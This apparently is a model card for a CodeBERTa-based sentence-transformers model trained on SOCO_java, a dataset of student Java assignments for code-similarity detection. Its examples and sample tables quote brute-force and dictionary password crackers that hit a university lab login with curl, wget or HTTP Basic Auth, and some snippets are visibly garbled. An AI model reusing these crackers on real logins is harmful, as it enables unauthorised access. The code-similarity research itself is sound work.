\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(\" Message.txt\
\ | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.\");\n\t\t\
\ \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException\
\ e){}\n\t}\n}\t\t\n"
- "import java.net.*;\nimport java.io.*;\nimport java.util.*;\n\npublic class Dictionary\
\ {\n\n public static void main(String[] args) {\n new CrackAttempt();\n\
\ }\n}\n\nclass CrackAttempt {\n public CrackAttempt() {\n final int\
\ MAX_LENGTH = 3;\n boolean auth = false;\n Date = new Date();\n \
\ String file = \"/usr/share/lib/dict/words\";\n String word;\n char[]\
\ password = new char[MAX_LENGTH];\n String resource = \"http://sec-crack.cs.rmit.edu./SEC/2/\"\
;\n\n while (!auth) {\n \n BufferedReader in = null;\n \
\ try {\n \n in = new BufferedReader(new FileReader(file));\n\
\ while ((word = in.readLine()) != null && !auth) {\n \
\ try {\n if (word.length() <= MAX_LENGTH) {\n \
\ password = word.toCharArray();\n \n \
\ Authenticator.setDefault(new CrackAuth(password));\n \
\ URL url = new URL(resource);\n HttpURLConnection conn\
\ = (HttpURLConnection)url.openConnection();\n conn.setRequestMethod(\"\
HEAD\");\n if (conn.getResponseCode() == HttpURLConnection.HTTP_OK)\
\ {\n System.out.println(\"cracked with \" + new String(password));\n\
\ auth = true;\n }\n \
\ }\n } catch (Exception e) {\n System.out.println(\"\
\ was exception: \" + e.getMessage());\n }\n }\n\n \
\ \n } catch (FileNotFoundException fnfe) {\n System.out.println(\"\
File Not Found\");\n } catch (IOException ioe) {\n System.out.println(\"\
IOException\");\n } catch(Exception e) {\n e.printStackTrace();\n\
\ } finally {\n try {\n in.close();\n \
\ } catch (Exception e) {;}\n }\n\n\n }\n if (!auth) {\n\
\ System.out.println(\"Unable determine password\");\n } else {\n\
\ time = (new Date()).getTime() - start.getTime();\n System.out.println(\"\
it took \" + String.valueOf(time) + \" milliseconds crack the password\");\n\
\ }\n }\n}\n\nclass CrackAuth extends Authenticator {\n char[] password;\n\
\ public CrackAuth(char[] password) {\n this.password = password;\n }\n\
\n protected PasswordAuthentication getPasswordAuthentication()\n {\n \
\ String user = \"\";\n return new PasswordAuthentication(user, password);\n\
\ }\n}\n"
- "import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\n\
import java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\
\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\n\
import javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\n\
import javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n \
\ static final String SMTP_SERVER = MailsendPropertyHelper.getProperty(\"smtpServer\"\
);\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty(\"\
recipient\");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty(\"\
sender\");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty(\"\
messageHeader\");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\
\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip\
\ = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject\
\ = MESSAGE_HEADER;\n\t\t\tString body = \"Testing\";\n\n\t\t\tSystem.out.println(\"\
Started sending the message\");\n\t\t\tMailsend.send(smtpServer,recip , from,\
\ subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\
\t\t\t\t\"Usage: java mailsend\"\n\t\t\t\t\t+ \" smtpServer toAddress fromAddress\
\ subjectText bodyText\");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic\
\ static void send(String smtpServer, String receiver,\tString from, String subject,\
\ String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\
\n\t\t\t\n\n\t\t\tprops.put(\"mail.smtp.host\", smtpServer);\n\t\t\tprops.put(\"\
mail.smtp.timeout\", \"20000\");\n\t\t\tprops.put(\"mail.smtp.connectiontimeout\"\
, \"20000\");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props,\
\ null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\
\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\t\
InternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\
\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\
\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println(\"sent the email with the\
\ differences : \"+ + \"using the mail server: \"+ smtpServer);\n\n\t\t}\n\t\t\
catch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n"
datasets:
- buelfhood/SOCO_java
pipeline_tag: sentence-similarity
library_name: sentence-transformers
---
# SentenceTransformer based on huggingface/CodeBERTa-small-v1
This is a [sentence-transformers](https://www.SBERT.net) model finetuned from [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) on the [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) dataset. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.
## Model Details
### Model Description
- **Model Type:** Sentence Transformer
- **Base model:** [huggingface/CodeBERTa-small-v1](https://huggingface.co/huggingface/CodeBERTa-small-v1) <!-- at revision e93b5898cff07f03f1c1c09cde284d1b85962363 -->
- **Maximum Sequence Length:** 512 tokens
- **Output Dimensionality:** 768 dimensions
- **Similarity Function:** Cosine Similarity
- **Training Dataset:**
- [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java)
<!-- - **Language:** Unknown -->
<!-- - **License:** Unknown -->
### Model Sources
- **Documentation:** [Sentence Transformers Documentation](https://sbert.net)
- **Repository:** [Sentence Transformers on GitHub](https://github.com/UKPLab/sentence-transformers)
- **Hugging Face:** [Sentence Transformers on Hugging Face](https://huggingface.co/models?library=sentence-transformers)
### Full Model Architecture
```
SentenceTransformer(
(0): Transformer({'max_seq_length': 512, 'do_lower_case': False}) with Transformer model: RobertaModel
(1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
)
```
## Usage
### Direct Usage (Sentence Transformers)
First install the Sentence Transformers library:
```bash
pip install -U sentence-transformers
```
Then you can load this model and run inference.
```python
from sentence_transformers import SentenceTransformer
# Download from the 🤗 Hub
model = SentenceTransformer("buelfhood/CodeBERTa-small-v1-SOCO-Java-SoftmaxLoss")
# Run inference
sentences = [
'\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\nclass BruteForce\n{\n\n public static void main (String a[])\n {\n \n final char [] alphabet = {\n \'A\', \'B\', \'C\', \'D\', \'E\', \'F\', \'G\', \'H\',\n \'I\', \'J\', \'K\', \'L\', \'M\', \'N\', \'O\', \'P\',\n \'Q\', \'R\', \'S\', \'T\', \'U\', \'V\', \'W\', \'X\',\n \'Y\', \'Z\', \'a\', \'b\', \'c\', \'d\', \'e\', \'f\',\n \'g\', \'h\', \'i\', \'j\', \'k\', \'l\', \'m\', \'n\',\n \'o\', \'p\', \'q\', \'r\', \'s\', \'t\', \'u\', \'v\',\n \'w\', \'x\', \'y\', \'z\'};\n\n String pwd="";\n \n for(int i=0;i<52;i++)\n {\n for(int j=0;j<52;j++)\n {\n for(int k=0;k<52;k++)\n {\n pwd = alphabet[i]+""+alphabet[j]+""+alphabet[k];\n String userPassword = ":"+pwd;\n RealThread myTh = new RealThread(i,userPassword);\n Thread th = new Thread( myTh );\n th.start();\n try\n {\n \n \n th.sleep(100);\n }\n catch(Exception e)\n {} \n }\n }\n }\n\n\n}\n\n\n}\n\n\nclass RealThread implements Runnable\n{\n private int num;\n private URL url;\n private HttpURLConnection uc =null;\n private String userPassword;\n private int responseCode = 100;\n public RealThread (int i, String userPassword)\n {\n try\n {\n url = new URL("http://sec-crack.cs.rmit.edu./SEC/2/");\n }\n catch(Exception ex1)\n {\n }\n num = i;\n this.userPassword = userPassword;\n\n }\n \n public int getResponseCode()\n {\n\n return this.responseCode;\n }\n\n public void run()\n {\n try\n {\n String encoding = new url.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n uc = (HttpURLConnection)url.openConnection();\n uc.setRequestProperty ("Authorization", " " + encoding);\n System.out.println("Reponse = "+uc.getResponseCode()+"for pwd = "+userPassword);\n this.responseCode = uc.getResponseCode();\n \n if(uc.getResponseCode()==200)\n {\n System.out.println(" ======= Password Found : "+userPassword+" ========================================= ");\n System.exit(0);\n }\n\n }\n catch (Exception e) {\n System.out.println("Could not execute Thread "+num+" ");\n }\n }\n\n}\n',
'import java.io.BufferedReader;\nimport java.io.FileInputStream;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.util.Date;\nimport java.util.Properties;\n\nimport javax.mail.Message;\nimport javax.mail.Session;\nimport javax.mail.Transport;\nimport javax.mail.Message.RecipientType;\nimport javax.mail.internet.InternetAddress;\nimport javax.mail.internet.MimeMessage;\n\n\n\n\npublic class Mailsend\n{\n static final String SMTP_SERVER = MailsendPropertyHelper.getProperty("smtpServer");\n static final String RECIPIENT_EMAIL = MailsendPropertyHelper.getProperty("recipient");\n static final String SENDER_EMAIL = MailsendPropertyHelper.getProperty("sender");\n static final String MESSAGE_HEADER = MailsendPropertyHelper.getProperty("messageHeader");\n\n\n\t\n\n\tpublic static void main(String args[])\n\t{\n\t\ttry\n\t\t{\n\t\t\t\n\t\t\tString smtpServer = SMTP_SERVER;\n\t\t\tString recip = RECIPIENT_EMAIL;\n\t\t\tString from = SENDER_EMAIL;\n\t\t\tString subject = MESSAGE_HEADER;\n\t\t\tString body = "Testing";\n\n\t\t\tSystem.out.println("Started sending the message");\n\t\t\tMailsend.send(smtpServer,recip , from, subject, body);\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tSystem.out.println(\n\t\t\t\t"Usage: java mailsend"\n\t\t\t\t\t+ " smtpServer toAddress fromAddress subjectText bodyText");\n\t\t}\n\n\t\tSystem.exit(0);\n\t}\n\n\n\t\n\tpublic static void send(String smtpServer, String receiver,\tString from, String subject, String body)\n\n\t{\n\t\ttry\n\t\t{\n\t\t\tProperties props = System.getProperties();\n\n\t\t\t\n\n\t\t\tprops.put("mail.smtp.host", smtpServer);\n\t\t\tprops.put("mail.smtp.timeout", "20000");\n\t\t\tprops.put("mail.smtp.connectiontimeout", "20000");\n\n\t\t\t\n\t\t\tSession session = Session.getDefaultInstance(props, null);\n\n\n\t\t\t\n\t\t\tMessage msg = new MimeMessage(session);\n\n\t\t\t\n\t\t\tmsg.setFrom(new InternetAddress(from));\n\t\t\tmsg.setRecipients(Message.RecipientType.NORMAL,\tInternetAddress.parse(receiver, false));\n\n\n\n\t\t\t\n\t\t\tmsg.setSubject(subject);\n\n\t\t\tmsg.setSentDate(new Date());\n\n\t\t\tmsg.setText(body);\n\n\t\t\t\n\t\t\tTransport.send(msg);\n\n\t\t\tSystem.out.println("sent the email with the differences : "+ + "using the mail server: "+ smtpServer);\n\n\t\t}\n\t\tcatch (Exception ex)\n\t\t{\n\t\t\tex.printStackTrace();\n\t\t}\n\t}\n}\n',
'\n\n\n\n\n\nimport java.util.*;\nimport java.io.*;\nimport java.net.*;\n\npublic class Watchdog extends TimerTask\n{\n\tpublic void run()\n\t{\n\t\tRuntime t = Runtime.getRuntime();\n\t \tProcess pr= null;\n\t \tString Fmd5,Smd5,temp1;\n\t \tint index;\n \n\t \ttry\n \t{\n\t\t \n\t\t pr = t.exec("md5sum csfirst.html");\n\n InputStreamReader stre = new InputStreamReader(pr.getInputStream());\n BufferedReader bread = new BufferedReader(stre);\n\t\t \n\t\t s = bread.readLine();\n\t\t index = s.indexOf(\' \');\n\t\t Fmd5 = s.substring(0,index);\n\t\t System.out.println(Fmd5);\n\t\t \n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("wget http://www.cs.rmit.edu./students/");\n\t\t pr = null;\n\t\t \n\t\t pr = t.exec("md5sum index.html");\n\t\t \n\n\t\t InputStreamReader stre1 = new InputStreamReader(pr.getInputStream());\n BufferedReader bread1 = new BufferedReader(stre1);\n\t\t \n\t\t temp1 = bread1.readLine();\n\t\t index = temp1.indexOf(\' \');\n\t\t Smd5 = temp1.substring(0,index);\n\t\t System.out.println(Smd5);\n\t\t\n\t\t pr = null;\n\t\t\n\t\t if(Fmd5 == Smd5)\n\t\t System.out.println(" changes Detected");\n\t\t else\n\t\t {\n\t\t pr = t.exec("diff csfirst.html index.html > report.html");\n\t\t pr = null;\n\t\t \n\t\t try{\n\t\t Thread.sleep(10000);\n\t\t }catch(Exception e){}\n\t\t \n\t\t pr = t.exec(" Message.txt | mutt -s Chnages Webpage -a report.html -x @yallara.cs.rmit.edu.");\n\t\t \n\t\t \n\t\t \n\t\t } \n\t\t \n \t }catch(java.io.IOException e){}\n\t}\n}\t\t\n',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
```
<!--
### Direct Usage (Transformers)
<details><summary>Click to see the direct usage in Transformers</summary>
</details>
-->
<!--
### Downstream Usage (Sentence Transformers)
You can finetune this model on your own dataset.
<details><summary>Click to expand</summary>
</details>
-->
<!--
### Out-of-Scope Use
*List how the model may foreseeably be misused and address what users ought not to do with the model.*
-->
<!--
## Bias, Risks and Limitations
*What are the known or foreseeable issues stemming from this model? You could also flag here known failure cases or weaknesses of the model.*
-->
<!--
### Recommendations
*What are recommendations with respect to the foreseeable issues? For example, filtering explicit content.*
-->
## Training Details
### Training Dataset
#### soco_java
* Dataset: [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) at [c8fab14](https://huggingface.co/datasets/buelfhood/SOCO_java/tree/c8fab14a9c72776b7d47763c7ab0bccaed49b7fc)
* Size: 30,069 training samples
* Columns: <code>label</code>, <code>text_1</code>, and <code>text_2</code>
* Approximate statistics based on the first 1000 samples:
| | label | text_1 | text_2 |
|:--------|:-----------------------------------------------|:-------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------|
| type | int | string | string |
| details | <ul><li>0: ~99.70%</li><li>1: ~0.30%</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 450.65 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 468.5 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| label | text_1 | text_2 |
|:---------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>0</code> | <code><br><br><br><br> <br>import java.io.*;<br>import java.net.*;<br>import java.Runtime;<br>import java.util.*;<br>import java.net.smtp.SmtpClient; <br><br><br><br>public class WatchDog<br><br>{<br><br> static String strImageOutputFile01 = "WebPageImages01.txt";<br> static String strImageOutputFile02 = "WebPageImages02.txt";<br><br> static String strWebPageOutputFile01 = "WebPageOutput01.txt";<br> static String strWebPageOutputFile02 = "WebPageOutput02.txt";<br><br> static String strWatchDogDiffFile_01_02 = "WatchDogDiff_01_02.txt";<br><br> static String strFromEmailDefault = "@.rmit.edu.";<br> static String strToEmailDefault = "@.rmit.edu.";<br><br> static String strFromEmail = null;<br> static String strToEmail = null;<br><br><br><br><br> public static void main (String args[])<br> <br> {<br><br> <br> <br> <br> <br> <br><br> URL url = null;<br> HttpURLConnection urlConnection;<br> int intContentLength;<br> String strWebPageText = "";<br><br> String strURL = "http://www.cs.rmit.edu./students/";<br> String strPrePend = "...</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Watchdog<br>{<br> public static void main(String args[])<br> {<br> <br> String mainLink="http://www.cs.rmit.edu./students/";<br> String sender = "@cs.rmit.edu.";<br> String recipient = "<webtech@acuneeds.>";<br> String hostName = "yallara.cs.rmit.edu.";<br> int delay = 86400000;<br><br> try<br> {<br> int imgSrcIndex, imgSrcEnd;<br> String imgLink;<br> Vector imageList = new Vector();<br> HttpURLConnection imgConnection;<br> URL imgURL;<br><br> <br> EmailClient email = new EmailClient(sender, recipient, hostName);<br><br> <br> URL url=new URL(mainLink);<br> HttpURLConnection connection = (HttpURLConnection) url.openConnection();<br><br> BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));<br><br> <br> FileWriter fwrite = new FileWriter("local.txt");<br> BufferedWriter writefile = new BufferedWriter(fwrite);<br><br> String line=webpage.readLine();<br><br> while (line != null)<br> {<br> <br> writefile.write(line,0,line.length());<br> wri...</code> |
| <code>0</code> | <code>import java.util.*;<br>import java.io.*;<br>import java.*;<br><br>public class Dogs5<br>{<br> public static void main(String [] args) throws Exception<br> { <br> executes("rm index.*");<br> executes("wget http://www.cs.rmit.edu./students");<br><br> while (true)<br> {<br> String addr= "wget http://www.cs.rmit.edu./students";<br> executes(addr);<br> String hash1 = md5sum("index.html");<br> String hash2 = md5sum("index.html.1");<br> System.out.println(hash1 +"|"+ hash2);<br> <br> BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt"));<br><br> String line=" " ;<br> String line1=" " ;<br> String line2=" ";<br> String line3=" ";<br> String[] cad = new String[10];<br> <br> executes("./.sh");<br> <br> int i=0;<br> while ((line = buf.readLine()) != null)<br> {<br> <br> line1="http://www.cs.rmit.edu./students/images"+line;<br> if (i==1)<br> line2="http://www.cs.rmi...</code> | <code><br><br>import java.Runtime;<br>import java.io.*;<br><br>public class differenceFile<br>{<br> StringWriter sw =null;<br> PrintWriter pw = null;<br> public differenceFile()<br> {<br> sw = new StringWriter();<br> pw = new PrintWriter();<br> }<br> public String compareFile()<br> {<br> try<br> {<br> Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");<br><br> InputStream write = sw.getInputStream();<br> BufferedReader bf = new BufferedReader (new InputStreamReader(write));<br> String line;<br> while((line = bf.readLine())!=null)<br> pw.println(line);<br> if((sw.toString().trim()).equals(""))<br> {<br> System.out.println(" difference");<br> return null;<br> }<br> System.out.println(sw.toString().trim());<br> }catch(Exception e){}<br> return sw.toString().trim();<br> }<br>}</code> |
| <code>0</code> | <code><br><br>import java.util.*;<br>import java.text.*;<br>import java.io.*;<br>import java.*;<br>import java.net.*;<br><br>public class WatchDog<br>{<br> public static void main(String args[])<br> {<br> String s = null;<br> String webpage = "http://www.cs.rmit.edu./students/";<br> <br> <br> String file1 = "file1";<br> String file2 = "file2";<br> <br> try<br> {<br> Process p = Runtime.getRuntime().exec("wget -O " + file1 + " " + webpage);<br> <br> BufferedReader stdInput = new BufferedReader(new <br> InputStreamReader(p.getInputStream()));<br><br> BufferedReader stdError = new BufferedReader(new <br> InputStreamReader(p.getErrorStream()));<br><br> <br> while ((s = stdInput.readLine()) != null) { <br> System.out.println(s);<br> }<br> <br> <br> while ((s = stdError.readLine()) != null) { <br> System.out.println(s);<br> }<br> <br> try<br> {<br> p.waitFor(); <br> }<br> catch...</code> | <code><br><br>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br>import java.String;<br>import java.Object;<br>import java.awt.*;<br><br><br><br>public class WatchDog<br>{<br> private URL url;<br> private URLConnection urlcon;<br> private int lastModifiedSince = 0;<br> private int lastModified[] = new int[2];<br><br> private int count = 0;<br><br> public static String oldFile;<br> public static String newFile;<br><br> private String diffFile;<br><br> private BufferedWriter bw;<br> private Process p;<br> private Runtime r;<br> private String fileName;<br><br> <br> <br> private ArrayList old[]= new ArrayList[500];<br> private ArrayList news[] = new ArrayList[500];<br> private String info = "";<br> private int index = 0;<br><br> public WatchDog(String fileName)<br> {<br> this.fileName = fileName;<br> oldFile = fileName + ".old";<br> newFile = fileName + ".new";<br> diffFile = "testFile.txt";<br> }<br> public static void main(String args[])<br> {<br> WatchDog wd = new WatchDog("TestDog");<br><br> wd.detectChange(WatchDog.oldFile);<br> while (true)<br> {<br> try<br> {<br> Thread.slee...</code> |
* Loss: [<code>SoftmaxLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#softmaxloss)
### Evaluation Dataset
#### soco_java
* Dataset: [soco_java](https://huggingface.co/datasets/buelfhood/SOCO_java) at [c8fab14](https://huggingface.co/datasets/buelfhood/SOCO_java/tree/c8fab14a9c72776b7d47763c7ab0bccaed49b7fc)
* Size: 3,342 evaluation samples
* Columns: <code>label</code>, <code>text_1</code>, and <code>text_2</code>
* Approximate statistics based on the first 1000 samples:
| | label | text_1 | text_2 |
|:--------|:-----------------------------------------------|:-------------------------------------------------------------------------------------|:-------------------------------------------------------------------------------------|
| type | int | string | string |
| details | <ul><li>0: ~99.40%</li><li>1: ~0.60%</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 443.11 tokens</li><li>max: 512 tokens</li></ul> | <ul><li>min: 51 tokens</li><li>mean: 467.05 tokens</li><li>max: 512 tokens</li></ul> |
* Samples:
| label | text_1 | text_2 |
|:---------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|:---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| <code>0</code> | <code><br><br>import java.Runtime;<br>import java.io.*;<br><br>public class differenceFile<br>{<br> StringWriter sw =null;<br> PrintWriter pw = null;<br> public differenceFile()<br> {<br> sw = new StringWriter();<br> pw = new PrintWriter();<br> }<br> public String compareFile()<br> {<br> try<br> {<br> Process = Runtime.getRuntime().exec("diff History.txt Comparison.txt");<br><br> InputStream write = sw.getInputStream();<br> BufferedReader bf = new BufferedReader (new InputStreamReader(write));<br> String line;<br> while((line = bf.readLine())!=null)<br> pw.println(line);<br> if((sw.toString().trim()).equals(""))<br> {<br> System.out.println(" difference");<br> return null;<br> }<br> System.out.println(sw.toString().trim());<br> }catch(Exception e){}<br> return sw.toString().trim();<br> }<br>}</code> | <code><br><br><br><br><br><br><br>import java.*;<br>import java.io.*;<br>import java.util.*;<br><br>public class BruteForce<br>{<br><br> public static void main(String[] args) <br> {<br> Runtime rt = Runtime.getRuntime();<br> Process pr= null;<br> char chars[] = {'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'};<br> String pass;<br> char temp[] = {'a','a'};<br> char temp1[] = {'a','a','a'};<br> char temp2[] = {'a'};<br><br> String f= new String();<br> String resp = new String();<br> int count=0;<br> String success = new String();<br> InputStreamReader instre;<br> BufferedReader bufread;<br><br><br> for(int k=0;k<52;k++)<br> {<br> temp2[0]=chars[k];<br> pass = new String(temp2); <br> count++; <br><br> System.out.println("The password tried ...</code> |
| <code>0</code> | <code>import java.io.*;<br>import java.net.*;<br>import java.util.*;<br><br>public class Watchdog<br>{<br> public static void main(String args[])<br> {<br> <br> String mainLink="http://www.cs.rmit.edu./students/";<br> String sender = "@cs.rmit.edu.";<br> String recipient = "<webtech@acuneeds.>";<br> String hostName = "yallara.cs.rmit.edu.";<br> int delay = 86400000;<br><br> try<br> {<br> int imgSrcIndex, imgSrcEnd;<br> String imgLink;<br> Vector imageList = new Vector();<br> HttpURLConnection imgConnection;<br> URL imgURL;<br><br> <br> EmailClient email = new EmailClient(sender, recipient, hostName);<br><br> <br> URL url=new URL(mainLink);<br> HttpURLConnection connection = (HttpURLConnection) url.openConnection();<br><br> BufferedReader webpage = new BufferedReader(new InputStreamReader(connection.getInputStream()));<br><br> <br> FileWriter fwrite = new FileWriter("local.txt");<br> BufferedWriter writefile = new BufferedWriter(fwrite);<br><br> String line=webpage.readLine();<br><br> while (line != null)<br> {<br> <br> writefile.write(line,0,line.length());<br> wri...</code> | <code><br><br>import java.net.*;<br>import java.io.*;<br>import java.String;<br>import java.*;<br>import java.util.*;<br><br>public class BruteForce {<br> private static final int passwdLength = 3; <br> private static String commandLine<br> = "curl http://sec-crack.cs.rmit.edu./SEC/2/index.php -I -u :";<br> private String chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";<br> private int charLen = chars.length(); <br> private int n = 0; <br> private int n3 = charLen*charLen*charLen; <br> private String response;<br> private String[] password = new String[charLen*charLen*charLen+charLen*charLen+charLen];<br> private char[][] data = new char[passwdLength][charLen];<br> private char[] pwdChar2 = new char[2];<br> private char[] pwdChar = new char[passwdLength];<br> private String url;<br> private int startTime;<br> private int endTime;<br> private int totalTime;<br> private float averageTime;<br> private boolean finish;<br> private Process curl;<br> private BufferedReader bf, responseLine;<br><br>...</code> |
| <code>0</code> | <code><br>import java.io.*;<br>import java.awt.*;<br>import java.net.*;<br><br>public class BruteForce<br>{<br> public static void main (String[] args)<br> {<br> String pw = new String();<br> pw = getPassword ();<br> System.out.println("Password is: "+pw);<br> }<br> public static String getPassword()<br> {<br> String passWord = new String();<br> passWord = "AAA";<br> char[] guess = passWord.toCharArray();<br> Process pro = null;<br> Runtime runtime = Runtime.getRuntime();<br> BufferedReader in = null;<br> String str=null;<br> boolean found = true;<br><br> System.out.println(" attacking.....");<br> for (int i=65;i<=122 ;i++ )<br> {<br> guess[0]=(char)(i);<br> for (int j=65;j<=122 ;j++ )<br> {<br> guess[1]=(char)(j);<br> for (int k=65 ;k<=122 ;k++ )<br> {<br> guess[2]=(char)(k);<br> passWord = new String(guess);<br> String cmd = "wget --http-user= --http-passwd="+passWord +" http://sec-crack.cs.rmit.edu./SEC/2/index.php ";<br> try<br> {<br> pro = runtime.exec(cmd);<br><br> in = new BufferedReader(new InputStreamReader(pro.getErrorSt...</code> | <code><br><br>import java.io.*;<br>import java.text.*;<br>import java.util.*;<br>import java.net.*;<br><br>public class BruteForce extends Thread<br>{<br> private static final String USERNAME = "";<br> private static final char [] POSSIBLE_CHAR =<br> {'a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm',<br> 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',<br> 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M',<br> 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z'};<br> private static int NUMBER_OF_THREAD = 500;<br><br> private static Date startDate = null;<br> private static Date endDate = null;<br><br> private String address;<br> private String password;<br><br> public BruteForce(String address, String password)<br> {<br> this.address = address;<br> this.password = password;<br> }<br><br> public static void main(String[] args) throws IOException<br> {<br> if (args.length < 1)<br> {<br> System.err.println("Invalid usage!");<br> System.err.println("...</code> |
* Loss: [<code>SoftmaxLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#softmaxloss)
### Training Hyperparameters
#### Non-Default Hyperparameters
- `eval_strategy`: steps
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `learning_rate`: 2e-05
- `num_train_epochs`: 1
- `warmup_ratio`: 0.1
- `fp16`: True
#### All Hyperparameters
<details><summary>Click to expand</summary>
- `overwrite_output_dir`: False
- `do_predict`: False
- `eval_strategy`: steps
- `prediction_loss_only`: True
- `per_device_train_batch_size`: 16
- `per_device_eval_batch_size`: 16
- `per_gpu_train_batch_size`: None
- `per_gpu_eval_batch_size`: None
- `gradient_accumulation_steps`: 1
- `eval_accumulation_steps`: None
- `torch_empty_cache_steps`: None
- `learning_rate`: 2e-05
- `weight_decay`: 0.0
- `adam_beta1`: 0.9
- `adam_beta2`: 0.999
- `adam_epsilon`: 1e-08
- `max_grad_norm`: 1.0
- `num_train_epochs`: 1
- `max_steps`: -1
- `lr_scheduler_type`: linear
- `lr_scheduler_kwargs`: {}
- `warmup_ratio`: 0.1
- `warmup_steps`: 0
- `log_level`: passive
- `log_level_replica`: warning
- `log_on_each_node`: True
- `logging_nan_inf_filter`: True
- `save_safetensors`: True
- `save_on_each_node`: False
- `save_only_model`: False
- `restore_callback_states_from_checkpoint`: False
- `no_cuda`: False
- `use_cpu`: False
- `use_mps_device`: False
- `seed`: 42
- `data_seed`: None
